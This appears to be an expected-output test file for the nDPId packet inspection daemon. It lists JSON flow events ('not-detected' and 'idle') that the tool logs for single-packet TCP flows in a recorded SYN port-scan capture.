+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 